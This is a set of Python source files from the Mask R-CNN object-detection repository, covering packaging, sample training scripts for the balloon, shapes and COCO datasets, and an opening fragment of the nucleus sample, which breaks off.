File: setup.py """ The build/compilations setup >> pip install -r requirements.txt >> python setup.py install """ import pip import logging import pkg_resources try: from setuptools import setup except ImportError: from distutils.core import setup def _parse_requirements(file_path): pip_ver = pkg_resources.get_distribution('pip').version pip_version = list(map(int, pip_ver.split('.')[:2])) if pip_version >= [6, 0]: raw = pip.req.parse_requirements(file_path, session=pip.download.PipSession()) else: raw = pip.req.parse_requirements(file_path) return [str(i.req) for i in raw] # parse_requirements() returns generator of pip.req.InstallRequirement objects try: install_reqs = _parse_requirements("requirements.txt") except Exception: logging.warning('Fail load requirements file, so using default ones.') install_reqs = [] setup( name='mask-rcnn', version='2.1', url='https://github.com/matterport/Mask_RCNN', author='Matterport', author_email='[email protected]', license='MIT', description='Mask R-CNN for object detection and instance segmentation', packages=["mrcnn"], install_requires=install_reqs, include_package_data=True, python_requires='>=3.4', long_description="""This is an implementation of Mask R-CNN on Python 3, Keras, and TensorFlow. The model generates bounding boxes and segmentation masks for each instance of an object in the image. It's based on Feature Pyramid Network (FPN) and a ResNet101 backbone.""", classifiers=[ "Development Status :: 5 - Production/Stable", "Environment :: Console", "Intended Audience :: Developers", "Intended Audience :: Information Technology", "Intended Audience :: Education", "Intended Audience :: Science/Research", "License :: OSI Approved :: MIT License", "Natural Language :: English", "Operating System :: OS Independent", "Topic :: Scientific/Engineering :: Artificial Intelligence", "Topic :: Scientific/Engineering :: Image Recognition", "Topic :: Scientific/Engineering :: Visualization", "Topic :: Scientific/Engineering :: Image Segmentation", 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', ], keywords="image instance segmentation object detection mask rcnn r-cnn tensorflow keras", ) File: samples/balloon/balloon.py """ Mask R-CNN Train on the toy Balloon dataset and implement color splash effect. Copyright (c) 2018 Matterport, Inc. Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla ------------------------------------------------------------ Usage: import the module (see Jupyter notebooks for examples), or run from the command line as such: # Train a new model starting from pre-trained COCO weights python3 balloon.py train --dataset=/path/to/balloon/dataset --weights=coco # Resume training a model that you had trained earlier python3 balloon.py train --dataset=/path/to/balloon/dataset --weights=last # Train a new model starting from ImageNet weights python3 balloon.py train --dataset=/path/to/balloon/dataset --weights=imagenet # Apply color splash to an image python3 balloon.py splash --weights=/path/to/weights/file.h5 --image=<URL or path to file> # Apply color splash to video using the last weights you trained python3 balloon.py splash --weights=last --video=<URL or path to file> """ import os import sys import json import datetime import numpy as np import skimage.draw # Root directory of the project ROOT_DIR = os.path.abspath("../../") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of the library from mrcnn.config import Config from mrcnn import model as modellib, utils # Path to trained weights file COCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5") # Directory to save logs and model checkpoints, if not provided # through the command line argument --logs DEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, "logs") ############################################################ # Configurations ############################################################ class BalloonConfig(Config): """Configuration for training on the toy dataset. Derives from the base Config class and overrides some values. """ # Give the configuration a recognizable name NAME = "balloon" # We use a GPU with 12GB memory, which can fit two images. # Adjust down if you use a smaller GPU. IMAGES_PER_GPU = 2 # Number of classes (including background) NUM_CLASSES = 1 + 1 # Background + balloon # Number of training steps per epoch STEPS_PER_EPOCH = 100 # Skip detections with < 90% confidence DETECTION_MIN_CONFIDENCE = 0.9 ############################################################ # Dataset ############################################################ class BalloonDataset(utils.Dataset): def load_balloon(self, dataset_dir, subset): """Load a subset of the Balloon dataset. dataset_dir: Root directory of the dataset. subset: Subset to load: train or val """ # Add classes. We have only one class to add. self.add_class("balloon", 1, "balloon") # Train or validation dataset? assert subset in ["train", "val"] dataset_dir = os.path.join(dataset_dir, subset) # Load annotations # VGG Image Annotator (up to version 1.6) saves each image in the form: # { 'filename': '28503151_5b5b7ec140_b.jpg', # 'regions': { # '0': { # 'region_attributes': {}, # 'shape_attributes': { # 'all_points_x': [...], # 'all_points_y': [...], # 'name': 'polygon'}}, # ... more regions ... # }, # 'size': 100202 # } # We mostly care about the x and y coordinates of each region # Note: In VIA 2.0, regions was changed from a dict to a list. annotations = json.load(open(os.path.join(dataset_dir, "via_region_data.json"))) annotations = list(annotations.values()) # don't need the dict keys # The VIA tool saves images in the JSON even if they don't have any # annotations. Skip unannotated images. annotations = [a for a in annotations if a['regions']] # Add images for a in annotations: # Get the x, y coordinaets of points of the polygons that make up # the outline of each object instance. These are stores in the # shape_attributes (see json format above) # The if condition is needed to support VIA versions 1.x and 2.x. if type(a['regions']) is dict: polygons = [r['shape_attributes'] for r in a['regions'].values()] else: polygons = [r['shape_attributes'] for r in a['regions']] # load_mask() needs the image size to convert polygons to masks. # Unfortunately, VIA doesn't include it in JSON, so we must read # the image. This is only managable since the dataset is tiny. image_path = os.path.join(dataset_dir, a['filename']) image = skimage.io.imread(image_path) height, width = image.shape[:2] self.add_image( "balloon", image_id=a['filename'], # use file name as a unique image id path=image_path, width=width, height=height, polygons=polygons) def load_mask(self, image_id): """Generate instance masks for an image. Returns: masks: A bool array of shape [height, width, instance count] with one mask per instance. class_ids: a 1D array of class IDs of the instance masks. """ # If not a balloon dataset image, delegate to parent class. image_info = self.image_info[image_id] if image_info["source"] != "balloon": return super(self.__class__, self).load_mask(image_id) # Convert polygons to a bitmap mask of shape # [height, width, instance_count] info = self.image_info[image_id] mask = np.zeros([info["height"], info["width"], len(info["polygons"])], dtype=np.uint8) for i, p in enumerate(info["polygons"]): # Get indexes of pixels inside the polygon and set them to 1 rr, cc = skimage.draw.polygon(p['all_points_y'], p['all_points_x']) mask[rr, cc, i] = 1 # Return mask, and array of class IDs of each instance. Since we have # one class ID only, we return an array of 1s return mask.astype(np.bool), np.ones([mask.shape[-1]], dtype=np.int32) def image_reference(self, image_id): """Return the path of the image.""" info = self.image_info[image_id] if info["source"] == "balloon": return info["path"] else: super(self.__class__, self).image_reference(image_id) def train(model): """Train the model.""" # Training dataset. dataset_train = BalloonDataset() dataset_train.load_balloon(args.dataset, "train") dataset_train.prepare() # Validation dataset dataset_val = BalloonDataset() dataset_val.load_balloon(args.dataset, "val") dataset_val.prepare() # *** This training schedule is an example. Update to your needs *** # Since we're using a very small dataset, and starting from # COCO trained weights, we don't need to train too long. Also, # no need to train all layers, just the heads should do it. print("Training network heads") model.train(dataset_train, dataset_val, learning_rate=config.LEARNING_RATE, epochs=30, layers='heads') def color_splash(image, mask): """Apply color splash effect. image: RGB image [height, width, 3] mask: instance segmentation mask [height, width, instance count] Returns result image. """ # Make a grayscale copy of the image. The grayscale copy still # has 3 RGB channels, though. gray = skimage.color.gray2rgb(skimage.color.rgb2gray(image)) * 255 # Copy color pixels from the original color image where mask is set if mask.shape[-1] > 0: # We're treating all instances as one, so collapse the mask into one layer mask = (np.sum(mask, -1, keepdims=True) >= 1) splash = np.where(mask, image, gray).astype(np.uint8) else: splash = gray.astype(np.uint8) return splash def detect_and_color_splash(model, image_path=None, video_path=None): assert image_path or video_path # Image or video? if image_path: # Run model detection and generate the color splash effect print("Running on {}".format(args.image)) # Read image image = skimage.io.imread(args.image) # Detect objects r = model.detect([image], verbose=1)[0] # Color splash splash = color_splash(image, r['masks']) # Save output file_name = "splash_{:%Y%m%dT%H%M%S}.png".format(datetime.datetime.now()) skimage.io.imsave(file_name, splash) elif video_path: import cv2 # Video capture vcapture = cv2.VideoCapture(video_path) width = int(vcapture.get(cv2.CAP_PROP_FRAME_WIDTH)) height = int(vcapture.get(cv2.CAP_PROP_FRAME_HEIGHT)) fps = vcapture.get(cv2.CAP_PROP_FPS) # Define codec and create video writer file_name = "splash_{:%Y%m%dT%H%M%S}.avi".format(datetime.datetime.now()) vwriter = cv2.VideoWriter(file_name, cv2.VideoWriter_fourcc(*'MJPG'), fps, (width, height)) count = 0 success = True while success: print("frame: ", count) # Read next image success, image = vcapture.read() if success: # OpenCV returns images as BGR, convert to RGB image = image[..., ::-1] # Detect objects r = model.detect([image], verbose=0)[0] # Color splash splash = color_splash(image, r['masks']) # RGB -> BGR to save image to video splash = splash[..., ::-1] # Add image to video writer vwriter.write(splash) count += 1 vwriter.release() print("Saved to ", file_name) ############################################################ # Training ############################################################ if __name__ == '__main__': import argparse # Parse command line arguments parser = argparse.ArgumentParser( description='Train Mask R-CNN to detect balloons.') parser.add_argument("command", metavar="<command>", help="'train' or 'splash'") parser.add_argument('--dataset', required=False, metavar="/path/to/balloon/dataset/", help='Directory of the Balloon dataset') parser.add_argument('--weights', required=True, metavar="/path/to/weights.h5", help="Path to weights .h5 file or 'coco'") parser.add_argument('--logs', required=False, default=DEFAULT_LOGS_DIR, metavar="/path/to/logs/", help='Logs and checkpoints directory (default=logs/)') parser.add_argument('--image', required=False, metavar="path or URL to image", help='Image to apply the color splash effect on') parser.add_argument('--video', required=False, metavar="path or URL to video", help='Video to apply the color splash effect on') args = parser.parse_args() # Validate arguments if args.command == "train": assert args.dataset, "Argument --dataset is required for training" elif args.command == "splash": assert args.image or args.video,\ "Provide --image or --video to apply color splash" print("Weights: ", args.weights) print("Dataset: ", args.dataset) print("Logs: ", args.logs) # Configurations if args.command == "train": config = BalloonConfig() else: class InferenceConfig(BalloonConfig): # Set batch size to 1 since we'll be running inference on # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 config = InferenceConfig() config.display() # Create model if args.command == "train": model = modellib.MaskRCNN(mode="training", config=config, model_dir=args.logs) else: model = modellib.MaskRCNN(mode="inference", config=config, model_dir=args.logs) # Select weights file to load if args.weights.lower() == "coco": weights_path = COCO_WEIGHTS_PATH # Download weights file if not os.path.exists(weights_path): utils.download_trained_weights(weights_path) elif args.weights.lower() == "last": # Find last trained weights weights_path = model.find_last() elif args.weights.lower() == "imagenet": # Start from ImageNet trained weights weights_path = model.get_imagenet_weights() else: weights_path = args.weights # Load weights print("Loading weights ", weights_path) if args.weights.lower() == "coco": # Exclude the last layers because they require a matching # number of classes model.load_weights(weights_path, by_name=True, exclude=[ "mrcnn_class_logits", "mrcnn_bbox_fc", "mrcnn_bbox", "mrcnn_mask"]) else: model.load_weights(weights_path, by_name=True) # Train or evaluate if args.command == "train": train(model) elif args.command == "splash": detect_and_color_splash(model, image_path=args.image, video_path=args.video) else: print("'{}' is not recognized. " "Use 'train' or 'splash'".format(args.command)) File: samples/shapes/shapes.py """ Mask R-CNN Configurations and data loading code for the synthetic Shapes dataset. This is a duplicate of the code in the noteobook train_shapes.ipynb for easy import into other notebooks, such as inspect_model.ipynb. Copyright (c) 2017 Matterport, Inc. Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla """ import os import sys import math import random import numpy as np import cv2 # Root directory of the project ROOT_DIR = os.path.abspath("../../") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of the library from mrcnn.config import Config from mrcnn import utils class ShapesConfig(Config): """Configuration for training on the toy shapes dataset. Derives from the base Config class and overrides values specific to the toy shapes dataset. """ # Give the configuration a recognizable name NAME = "shapes" # Train on 1 GPU and 8 images per GPU. We can put multiple images on each # GPU because the images are small. Batch size is 8 (GPUs * images/GPU). GPU_COUNT = 1 IMAGES_PER_GPU = 8 # Number of classes (including background) NUM_CLASSES = 1 + 3 # background + 3 shapes # Use small images for faster training. Set the limits of the small side # the large side, and that determines the image shape. IMAGE_MIN_DIM = 128 IMAGE_MAX_DIM = 128 # Use smaller anchors because our image and objects are small RPN_ANCHOR_SCALES = (8, 16, 32, 64, 128) # anchor side in pixels # Reduce training ROIs per image because the images are small and have # few objects. Aim to allow ROI sampling to pick 33% positive ROIs. TRAIN_ROIS_PER_IMAGE = 32 # Use a small epoch since the data is simple STEPS_PER_EPOCH = 100 # use small validation steps since the epoch is small VALIDATION_STEPS = 5 class ShapesDataset(utils.Dataset): """Generates the shapes synthetic dataset. The dataset consists of simple shapes (triangles, squares, circles) placed randomly on a blank surface. The images are generated on the fly. No file access required. """ def load_shapes(self, count, height, width): """Generate the requested number of synthetic images. count: number of images to generate. height, width: the size of the generated images. """ # Add classes self.add_class("shapes", 1, "square") self.add_class("shapes", 2, "circle") self.add_class("shapes", 3, "triangle") # Add images # Generate random specifications of images (i.e. color and # list of shapes sizes and locations). This is more compact than # actual images. Images are generated on the fly in load_image(). for i in range(count): bg_color, shapes = self.random_image(height, width) self.add_image("shapes", image_id=i, path=None, width=width, height=height, bg_color=bg_color, shapes=shapes) def load_image(self, image_id): """Generate an image from the specs of the given image ID. Typically this function loads the image from a file, but in this case it generates the image on the fly from the specs in image_info. """ info = self.image_info[image_id] bg_color = np.array(info['bg_color']).reshape([1, 1, 3]) image = np.ones([info['height'], info['width'], 3], dtype=np.uint8) image = image * bg_color.astype(np.uint8) for shape, color, dims in info['shapes']: image = self.draw_shape(image, shape, dims, color) return image def image_reference(self, image_id): """Return the shapes data of the image.""" info = self.image_info[image_id] if info["source"] == "shapes": return info["shapes"] else: super(self.__class__).image_reference(self, image_id) def load_mask(self, image_id): """Generate instance masks for shapes of the given image ID. """ info = self.image_info[image_id] shapes = info['shapes'] count = len(shapes) mask = np.zeros([info['height'], info['width'], count], dtype=np.uint8) for i, (shape, _, dims) in enumerate(info['shapes']): mask[:, :, i:i + 1] = self.draw_shape(mask[:, :, i:i + 1].copy(), shape, dims, 1) # Handle occlusions occlusion = np.logical_not(mask[:, :, -1]).astype(np.uint8) for i in range(count - 2, -1, -1): mask[:, :, i] = mask[:, :, i] * occlusion occlusion = np.logical_and( occlusion, np.logical_not(mask[:, :, i])) # Map class names to class IDs. class_ids = np.array([self.class_names.index(s[0]) for s in shapes]) return mask, class_ids.astype(np.int32) def draw_shape(self, image, shape, dims, color): """Draws a shape from the given specs.""" # Get the center x, y and the size s x, y, s = dims if shape == 'square': image = cv2.rectangle(image, (x - s, y - s), (x + s, y + s), color, -1) elif shape == "circle": image = cv2.circle(image, (x, y), s, color, -1) elif shape == "triangle": points = np.array([[(x, y - s), (x - s / math.sin(math.radians(60)), y + s), (x + s / math.sin(math.radians(60)), y + s), ]], dtype=np.int32) image = cv2.fillPoly(image, points, color) return image def random_shape(self, height, width): """Generates specifications of a random shape that lies within the given height and width boundaries. Returns a tuple of three valus: * The shape name (square, circle, ...) * Shape color: a tuple of 3 values, RGB. * Shape dimensions: A tuple of values that define the shape size and location. Differs per shape type. """ # Shape shape = random.choice(["square", "circle", "triangle"]) # Color color = tuple([random.randint(0, 255) for _ in range(3)]) # Center x, y buffer = 20 y = random.randint(buffer, height - buffer - 1) x = random.randint(buffer, width - buffer - 1) # Size s = random.randint(buffer, height // 4) return shape, color, (x, y, s) def random_image(self, height, width): """Creates random specifications of an image with multiple shapes. Returns the background color of the image and a list of shape specifications that can be used to draw the image. """ # Pick random background color bg_color = np.array([random.randint(0, 255) for _ in range(3)]) # Generate a few random shapes and record their # bounding boxes shapes = [] boxes = [] N = random.randint(1, 4) for _ in range(N): shape, color, dims = self.random_shape(height, width) shapes.append((shape, color, dims)) x, y, s = dims boxes.append([y - s, x - s, y + s, x + s]) # Apply non-max suppression wit 0.3 threshold to avoid # shapes covering each other keep_ixs = utils.non_max_suppression( np.array(boxes), np.arange(N), 0.3) shapes = [s for i, s in enumerate(shapes) if i in keep_ixs] return bg_color, shapes File: samples/coco/coco.py """ Mask R-CNN Configurations and data loading code for MS COCO. Copyright (c) 2017 Matterport, Inc. Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla ------------------------------------------------------------ Usage: import the module (see Jupyter notebooks for examples), or run from the command line as such: # Train a new model starting from pre-trained COCO weights python3 coco.py train --dataset=/path/to/coco/ --model=coco # Train a new model starting from ImageNet weights. Also auto download COCO dataset python3 coco.py train --dataset=/path/to/coco/ --model=imagenet --download=True # Continue training a model that you had trained earlier python3 coco.py train --dataset=/path/to/coco/ --model=/path/to/weights.h5 # Continue training the last model you trained python3 coco.py train --dataset=/path/to/coco/ --model=last # Run COCO evaluatoin on the last model you trained python3 coco.py evaluate --dataset=/path/to/coco/ --model=last """ import os import sys import time import numpy as np import imgaug # https://github.com/aleju/imgaug (pip3 install imgaug) # Download and install the Python COCO tools from https://github.com/waleedka/coco # That's a fork from the original https://github.com/pdollar/coco with a bug # fix for Python 3. # I submitted a pull request https://github.com/cocodataset/cocoapi/pull/50 # If the PR is merged then use the original repo. # Note: Edit PythonAPI/Makefile and replace "python" with "python3". from pycocotools.coco import COCO from pycocotools.cocoeval import COCOeval from pycocotools import mask as maskUtils import zipfile import urllib.request import shutil # Root directory of the project ROOT_DIR = os.path.abspath("../../") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of the library from mrcnn.config import Config from mrcnn import model as modellib, utils # Path to trained weights file COCO_MODEL_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5") # Directory to save logs and model checkpoints, if not provided # through the command line argument --logs DEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, "logs") DEFAULT_DATASET_YEAR = "2014" ############################################################ # Configurations ############################################################ class CocoConfig(Config): """Configuration for training on MS COCO. Derives from the base Config class and overrides values specific to the COCO dataset. """ # Give the configuration a recognizable name NAME = "coco" # We use a GPU with 12GB memory, which can fit two images. # Adjust down if you use a smaller GPU. IMAGES_PER_GPU = 2 # Uncomment to train on 8 GPUs (default is 1) # GPU_COUNT = 8 # Number of classes (including background) NUM_CLASSES = 1 + 80 # COCO has 80 classes ############################################################ # Dataset ############################################################ class CocoDataset(utils.Dataset): def load_coco(self, dataset_dir, subset, year=DEFAULT_DATASET_YEAR, class_ids=None, class_map=None, return_coco=False, auto_download=False): """Load a subset of the COCO dataset. dataset_dir: The root directory of the COCO dataset. subset: What to load (train, val, minival, valminusminival) year: What dataset year to load (2014, 2017) as a string, not an integer class_ids: If provided, only loads images that have the given classes. class_map: TODO: Not implemented yet. Supports maping classes from different datasets to the same class ID. return_coco: If True, returns the COCO object. auto_download: Automatically download and unzip MS-COCO images and annotations """ if auto_download is True: self.auto_download(dataset_dir, subset, year) coco = COCO("{}/annotations/instances_{}{}.json".format(dataset_dir, subset, year)) if subset == "minival" or subset == "valminusminival": subset = "val" image_dir = "{}/{}{}".format(dataset_dir, subset, year) # Load all classes or a subset? if not class_ids: # All classes class_ids = sorted(coco.getCatIds()) # All images or a subset? if class_ids: image_ids = [] for id in class_ids: image_ids.extend(list(coco.getImgIds(catIds=[id]))) # Remove duplicates image_ids = list(set(image_ids)) else: # All images image_ids = list(coco.imgs.keys()) # Add classes for i in class_ids: self.add_class("coco", i, coco.loadCats(i)[0]["name"]) # Add images for i in image_ids: self.add_image( "coco", image_id=i, path=os.path.join(image_dir, coco.imgs[i]['file_name']), width=coco.imgs[i]["width"], height=coco.imgs[i]["height"], annotations=coco.loadAnns(coco.getAnnIds( imgIds=[i], catIds=class_ids, iscrowd=None))) if return_coco: return coco def auto_download(self, dataDir, dataType, dataYear): """Download the COCO dataset/annotations if requested. dataDir: The root directory of the COCO dataset. dataType: What to load (train, val, minival, valminusminival) dataYear: What dataset year to load (2014, 2017) as a string, not an integer Note: For 2014, use "train", "val", "minival", or "valminusminival" For 2017, only "train" and "val" annotations are available """ # Setup paths and file names if dataType == "minival" or dataType == "valminusminival": imgDir = "{}/{}{}".format(dataDir, "val", dataYear) imgZipFile = "{}/{}{}.zip".format(dataDir, "val", dataYear) imgURL = "http://images.cocodataset.org/zips/{}{}.zip".format("val", dataYear) else: imgDir = "{}/{}{}".format(dataDir, dataType, dataYear) imgZipFile = "{}/{}{}.zip".format(dataDir, dataType, dataYear) imgURL = "http://images.cocodataset.org/zips/{}{}.zip".format(dataType, dataYear) # print("Image paths:"); print(imgDir); print(imgZipFile); print(imgURL) # Create main folder if it doesn't exist yet if not os.path.exists(dataDir): os.makedirs(dataDir) # Download images if not available locally if not os.path.exists(imgDir): os.makedirs(imgDir) print("Downloading images to " + imgZipFile + " ...") with urllib.request.urlopen(imgURL) as resp, open(imgZipFile, 'wb') as out: shutil.copyfileobj(resp, out) print("... done downloading.") print("Unzipping " + imgZipFile) with zipfile.ZipFile(imgZipFile, "r") as zip_ref: zip_ref.extractall(dataDir) print("... done unzipping") print("Will use images in " + imgDir) # Setup annotations data paths annDir = "{}/annotations".format(dataDir) if dataType == "minival": annZipFile = "{}/instances_minival2014.json.zip".format(dataDir) annFile = "{}/instances_minival2014.json".format(annDir) annURL = "https://dl.dropboxusercontent.com/s/o43o90bna78omob/instances_minival2014.json.zip?dl=0" unZipDir = annDir elif dataType == "valminusminival": annZipFile = "{}/instances_valminusminival2014.json.zip".format(dataDir) annFile = "{}/instances_valminusminival2014.json".format(annDir) annURL = "https://dl.dropboxusercontent.com/s/s3tw5zcg7395368/instances_valminusminival2014.json.zip?dl=0" unZipDir = annDir else: annZipFile = "{}/annotations_trainval{}.zip".format(dataDir, dataYear) annFile = "{}/instances_{}{}.json".format(annDir, dataType, dataYear) annURL = "http://images.cocodataset.org/annotations/annotations_trainval{}.zip".format(dataYear) unZipDir = dataDir # print("Annotations paths:"); print(annDir); print(annFile); print(annZipFile); print(annURL) # Download annotations if not available locally if not os.path.exists(annDir): os.makedirs(annDir) if not os.path.exists(annFile): if not os.path.exists(annZipFile): print("Downloading zipped annotations to " + annZipFile + " ...") with urllib.request.urlopen(annURL) as resp, open(annZipFile, 'wb') as out: shutil.copyfileobj(resp, out) print("... done downloading.") print("Unzipping " + annZipFile) with zipfile.ZipFile(annZipFile, "r") as zip_ref: zip_ref.extractall(unZipDir) print("... done unzipping") print("Will use annotations in " + annFile) def load_mask(self, image_id): """Load instance masks for the given image. Different datasets use different ways to store masks. This function converts the different mask format to one format in the form of a bitmap [height, width, instances]. Returns: masks: A bool array of shape [height, width, instance count] with one mask per instance. class_ids: a 1D array of class IDs of the instance masks. """ # If not a COCO image, delegate to parent class. image_info = self.image_info[image_id] if image_info["source"] != "coco": return super(CocoDataset, self).load_mask(image_id) instance_masks = [] class_ids = [] annotations = self.image_info[image_id]["annotations"] # Build mask of shape [height, width, instance_count] and list # of class IDs that correspond to each channel of the mask. for annotation in annotations: class_id = self.map_source_class_id( "coco.{}".format(annotation['category_id'])) if class_id: m = self.annToMask(annotation, image_info["height"], image_info["width"]) # Some objects are so small that they're less than 1 pixel area # and end up rounded out. Skip those objects. if m.max() < 1: continue # Is it a crowd? If so, use a negative class ID. if annotation['iscrowd']: # Use negative class ID for crowds class_id *= -1 # For crowd masks, annToMask() sometimes returns a mask # smaller than the given dimensions. If so, resize it. if m.shape[0] != image_info["height"] or m.shape[1] != image_info["width"]: m = np.ones([image_info["height"], image_info["width"]], dtype=bool) instance_masks.append(m) class_ids.append(class_id) # Pack instance masks into an array if class_ids: mask = np.stack(instance_masks, axis=2).astype(np.bool) class_ids = np.array(class_ids, dtype=np.int32) return mask, class_ids else: # Call super class to return an empty mask return super(CocoDataset, self).load_mask(image_id) def image_reference(self, image_id): """Return a link to the image in the COCO Website.""" info = self.image_info[image_id] if info["source"] == "coco": return "http://cocodataset.org/#explore?id={}".format(info["id"]) else: super(CocoDataset, self).image_reference(image_id) # The following two functions are from pycocotools with a few changes. def annToRLE(self, ann, height, width): """ Convert annotation which can be polygons, uncompressed RLE to RLE. :return: binary mask (numpy 2D array) """ segm = ann['segmentation'] if isinstance(segm, list): # polygon -- a single object might consist of multiple parts # we merge all parts into one mask rle code rles = maskUtils.frPyObjects(segm, height, width) rle = maskUtils.merge(rles) elif isinstance(segm['counts'], list): # uncompressed RLE rle = maskUtils.frPyObjects(segm, height, width) else: # rle rle = ann['segmentation'] return rle def annToMask(self, ann, height, width): """ Convert annotation which can be polygons, uncompressed RLE, or RLE to binary mask. :return: binary mask (numpy 2D array) """ rle = self.annToRLE(ann, height, width) m = maskUtils.decode(rle) return m ############################################################ # COCO Evaluation ############################################################ def build_coco_results(dataset, image_ids, rois, class_ids, scores, masks): """Arrange resutls to match COCO specs in http://cocodataset.org/#format """ # If no results, return an empty list if rois is None: return [] results = [] for image_id in image_ids: # Loop through detections for i in range(rois.shape[0]): class_id = class_ids[i] score = scores[i] bbox = np.around(rois[i], 1) mask = masks[:, :, i] result = { "image_id": image_id, "category_id": dataset.get_source_class_id(class_id, "coco"), "bbox": [bbox[1], bbox[0], bbox[3] - bbox[1], bbox[2] - bbox[0]], "score": score, "segmentation": maskUtils.encode(np.asfortranarray(mask)) } results.append(result) return results def evaluate_coco(model, dataset, coco, eval_type="bbox", limit=0, image_ids=None): """Runs official COCO evaluation. dataset: A Dataset object with valiadtion data eval_type: "bbox" or "segm" for bounding box or segmentation evaluation limit: if not 0, it's the number of images to use for evaluation """ # Pick COCO images from the dataset image_ids = image_ids or dataset.image_ids # Limit to a subset if limit: image_ids = image_ids[:limit] # Get corresponding COCO image IDs. coco_image_ids = [dataset.image_info[id]["id"] for id in image_ids] t_prediction = 0 t_start = time.time() results = [] for i, image_id in enumerate(image_ids): # Load image image = dataset.load_image(image_id) # Run detection t = time.time() r = model.detect([image], verbose=0)[0] t_prediction += (time.time() - t) # Convert results to COCO format # Cast masks to uint8 because COCO tools errors out on bool image_results = build_coco_results(dataset, coco_image_ids[i:i + 1], r["rois"], r["class_ids"], r["scores"], r["masks"].astype(np.uint8)) results.extend(image_results) # Load results. This modifies results with additional attributes. coco_results = coco.loadRes(results) # Evaluate cocoEval = COCOeval(coco, coco_results, eval_type) cocoEval.params.imgIds = coco_image_ids cocoEval.evaluate() cocoEval.accumulate() cocoEval.summarize() print("Prediction time: {}. Average {}/image".format( t_prediction, t_prediction / len(image_ids))) print("Total time: ", time.time() - t_start) ############################################################ # Training ############################################################ if __name__ == '__main__': import argparse # Parse command line arguments parser = argparse.ArgumentParser( description='Train Mask R-CNN on MS COCO.') parser.add_argument("command", metavar="<command>", help="'train' or 'evaluate' on MS COCO") parser.add_argument('--dataset', required=True, metavar="/path/to/coco/", help='Directory of the MS-COCO dataset') parser.add_argument('--year', required=False, default=DEFAULT_DATASET_YEAR, metavar="<year>", help='Year of the MS-COCO dataset (2014 or 2017) (default=2014)') parser.add_argument('--model', required=True, metavar="/path/to/weights.h5", help="Path to weights .h5 file or 'coco'") parser.add_argument('--logs', required=False, default=DEFAULT_LOGS_DIR, metavar="/path/to/logs/", help='Logs and checkpoints directory (default=logs/)') parser.add_argument('--limit', required=False, default=500, metavar="<image count>", help='Images to use for evaluation (default=500)') parser.add_argument('--download', required=False, default=False, metavar="<True|False>", help='Automatically download and unzip MS-COCO files (default=False)', type=bool) args = parser.parse_args() print("Command: ", args.command) print("Model: ", args.model) print("Dataset: ", args.dataset) print("Year: ", args.year) print("Logs: ", args.logs) print("Auto Download: ", args.download) # Configurations if args.command == "train": config = CocoConfig() else: class InferenceConfig(CocoConfig): # Set batch size to 1 since we'll be running inference on # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 DETECTION_MIN_CONFIDENCE = 0 config = InferenceConfig() config.display() # Create model if args.command == "train": model = modellib.MaskRCNN(mode="training", config=config, model_dir=args.logs) else: model = modellib.MaskRCNN(mode="inference", config=config, model_dir=args.logs) # Select weights file to load if args.model.lower() == "coco": model_path = COCO_MODEL_PATH elif args.model.lower() == "last": # Find last trained weights model_path = model.find_last() elif args.model.lower() == "imagenet": # Start from ImageNet trained weights model_path = model.get_imagenet_weights() else: model_path = args.model # Load weights print("Loading weights ", model_path) model.load_weights(model_path, by_name=True) # Train or evaluate if args.command == "train": # Training dataset. Use the training set and 35K from the # validation set, as as in the Mask RCNN paper. dataset_train = CocoDataset() dataset_train.load_coco(args.dataset, "train", year=args.year, auto_download=args.download) if args.year in '2014': dataset_train.load_coco(args.dataset, "valminusminival", year=args.year, auto_download=args.download) dataset_train.prepare() # Validation dataset dataset_val = CocoDataset() val_type = "val" if args.year in '2017' else "minival" dataset_val.load_coco(args.dataset, val_type, year=args.year, auto_download=args.download) dataset_val.prepare() # Image Augmentation # Right/Left flip 50% of the time augmentation = imgaug.augmenters.Fliplr(0.5) # *** This training schedule is an example. Update to your needs *** # Training - Stage 1 print("Training network heads") model.train(dataset_train, dataset_val, learning_rate=config.LEARNING_RATE, epochs=40, layers='heads', augmentation=augmentation) # Training - Stage 2 # Finetune layers from ResNet stage 4 and up print("Fine tune Resnet stage 4 and up") model.train(dataset_train, dataset_val, learning_rate=config.LEARNING_RATE, epochs=120, layers='4+', augmentation=augmentation) # Training - Stage 3 # Fine tune all layers print("Fine tune all layers") model.train(dataset_train, dataset_val, learning_rate=config.LEARNING_RATE / 10, epochs=160, layers='all', augmentation=augmentation) elif args.command == "evaluate": # Validation dataset dataset_val = CocoDataset() val_type = "val" if args.year in '2017' else "minival" coco = dataset_val.load_coco(args.dataset, val_type, year=args.year, return_coco=True, auto_download=args.download) dataset_val.prepare() print("Running COCO evaluation on {} images.".format(args.limit)) evaluate_coco(model, dataset_val, coco, "bbox", limit=int(args.limit)) else: print("'{}' is not recognized. " "Use 'train' or 'evaluate'".format(args.command)) File: samples/nucleus/nucleus.py """ Mask R-CNN Train on the nuclei segmentation dataset from the Kaggle 2018 Data Science Bowl https://www.kaggle.com/c/data-science-bowl-2018/ Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla ------------------------------------------------------------ Usage: import the module (see Jupyter notebooks for examples), or run from the command line as such: # Train a new model starting from ImageNet weights python3 nucleus.py train --dataset=/path/to/dataset --subset=train --weights=imagenet # Train a new model starting from specific weights file python3 nucleus.py train --dataset=/path/to/dataset --subset=train --weights=/path/to/weights.h5 # Resume training a model that you had trained earlier python3 nucleus.py train --dataset=/path/to/dataset --subset=train --weights=last # Generate submission file python3 nucleus.py detect --dataset=/path/to/dataset --subset=train --weights=<last or /path/to/weights.h5> """ # Set matplotlib backend # This has to be done before other importa that might # set it, but only if we're running in script mode # rather than being imported. if __name__ == '__main__': import matplotlib # Agg backend runs without a display 